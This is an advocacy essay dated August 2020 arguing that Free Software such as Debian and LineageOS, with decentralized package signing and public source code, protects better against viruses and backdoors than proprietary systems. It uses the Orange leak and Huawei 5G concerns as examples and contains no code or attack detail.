Malwares and backdoors: the Free Software approach

August 14, 2020

Data and communications must be protected from backdoors and viruses that could compromise them. Viruses introduce themselves into computer systems and may destroy or exploit the data they contain. Backdoors are deliberately inserted by the designers of a software application for the purpose of gaining access to the machines running the application. Both viruses and backdoors allow the people who control them to do things like extract confidential information. The risk is real: in July 2020, the company Orange confirmed they were targeted by a malware that leaked data belonging to its business customers.

The introduction of 5G in mobile phones is of concern not only to individuals, but also to States, who worry about the backdoors that 5G components may contain. A booming, billion-dollar industry was born to fight these plagues: some companies have even gone public. Beneficiaries of a seemingly endless war, these companies are evidently not motivated to really solve the problem once and for all.

But a solution is well within our reach. In Free Software (software for which the the source code is publicly available), there is effectively no way to hide backdoors, since the source code can be analyzed by the general public. And it is for this same reason that it becomes possible to identify viruses (in the binary code) that were not present during the software’s installation. But that solution relies on Free Software and is not mainstream: Microsoft, Apple or even Google do not advertise it because their economic model heavily depends on keeping their software’s source code secret. As a consequence, at least in the eyes of those not familiar with Free Software, proprietary software appears to be how computer systems naturally work and viruses and backdoors an inevitable threat.

However, by running computers and mobile phones with Free Software only, it is possible to benefit from the protection inherent in this class of software, and effectively solve the root of a problem that has plagued the proprietary software world since the first software virus appeared over twenty years ago.

What are backdoors and viruses?

A virus or, more generally, malware is a “software usually hidden within another seemingly innocuous program that can produce copies of itself and insert them into other programs or files, and that usually performs a harmful action”. It is therefore not delivered with the device (computer or mobile phone): it infects the device at a later time, when given the opportunity. For instance, a USB key can copy the virus it contains onto a machine to which it is connected. An email may have a document attached to it that turns out to be a virus that installs itself when the document is opened. Once installed, the virus sometime acts immediately (for instance, copying the victim’s address book onto the Internet to feed a database used by spammers). Or it can stay dormant and activate itself months later.

A backdoor is a “covert method of bypassing normal authentication or encryption in a computer, product, embedded device”. It is intentionally designed into the software or the machine, very much like secret passages in castles. In 2014, a backdoor was discovered in Samsung mobiles. The company went as far as to deny it could be a problem. Since it was not possible to figure out if it was used, it was just removed. But it demonstrates how difficult it can be to discover such backdoors. It is precisely why governments are worried about 5G electronic components embedded in mobile phones built by Huawei: the doubt will remain even if they are analyzed with great care.

Why can’t the industry eliminate viruses once and for all?

Anti-virus software relies on a catalog of known viruses, using it to search a computer’s memory and/or hard disk on a regular basis and to remove them. Since new viruses appear every day, this database must be updated regularly: otherwise it will miss the ones it does not know about. To put an end to this endless race, software editors, like Microsoft, imagined in mid-2000 that every software could be signed by an authority after verifying that it is not malicious. The hardware manufacturers were involved and most of today’s computer now have a secure boot that can prevent “the loading of drivers or OS loaders that are not signed with an acceptable digital signature”.

This solution obviously does not work, as demonstrated by the Orange data leak in 2020 as well as the healthy financial situation of companies selling anti-virus software.

This failure has one cause: the centralization of software signature control. For a software application to start on a hardware running (for instance) on an Intel processor, one would first need to obtain a signature from Intel. A number of software distributors did not agree to such a dependency, for ethical or financial reasons. Without this centralized signature verification mechanism, it is impossible for the machine to differentiate a virus from a piece of software written by someone who simply did not agree to Intel’s terms.

Since Free Software is, by definition, not controlled by a single entity, decentralized solutions had to be invented. For instance Debian GNU/Linux is published by hundreds of individuals, each of whom applies their own signature to prove they are indeed the author. In such a project, viruses are easy to isolate, since they are either (a) not signed at all or (b) signed, but by a stranger. Since there is no central organization who can guarantee the integrity of the address book of known authors, a web of trust was invented to distinguish strangers from trusted entities. To enter it one has to know at least two people who are already in it. This co-optation mechanism does not require centralization and all software can be signed without pledging allegiance to a single actor who centralizes all the powers. When you factor in the public availability of the source code, a process of software compilation that ensures the resulting binary code can be reproduced, bug bounties and other features unique to Free Software, this process produces software that, if not entirely immune to viruses, turns out to be much more resistant to them.

Revealing backdoors

When the designers of a software add a backdoor, they do their best to conceal it from the user or any person undertaking a careful examination of the software. Their main ally is the difficulty, for a human being – even a supremely qualified one – to understand binary code. Going back to Huawei, the scenario that is cause for concern regarding 5G components is the following:

  • Huawei engineers design the software required for 5G to work and add a backdoor
  • The source code of the software is compiled into binary code and inserted into millions of electronic components
  • These components are used in the making of mobile phones used by civil servants working for the Ministry of Defense
  • When one of these mobiles receives a call originating from a number controlled by the Chinese government, the door opens, giving the caller access to the information stored in the device

When software is found to have a backdoor and this fact is made public, it can be expected to be a source of great consternation and embarrassment for the software vendors. For this reason, a vendor will only include a backdoor in software when the risk of it being discovered is low - which is the case with proprietary software. With Free Software, on the other hand, its transparency dictates that discovery would be a foregone conclusion, and this has proven to be a very powerful deterrent.

Effective, but not absolute, protection

Although an organization who chooses to use only Free Software benefits from a very efficient protection against backdoors and viruses, there are still gray areas.

Some hardware components, in particular in mobile phones, cannot work with Free Software. The hardware manufacturers refuse to distribute the specifications and provide a binary driver which is, because of the lack of source code, suspicious. Although workarounds (such as libreboot) exist in some cases, they require expertise that is often out of reach for modest organizations.

Most of the time it is enough to install Debian GNU/Linux on a computer and LineageOS on a mobile phone, both of them Free Software, to be adequately protected from most threats. The remaining threat comes from someone using viruses and backdoors bought on the black market. But they are more difficult to find and more expensive because there are less customers than for Windows or macOS. They are also rare because, as demonstrated, countermeasures are more efficient.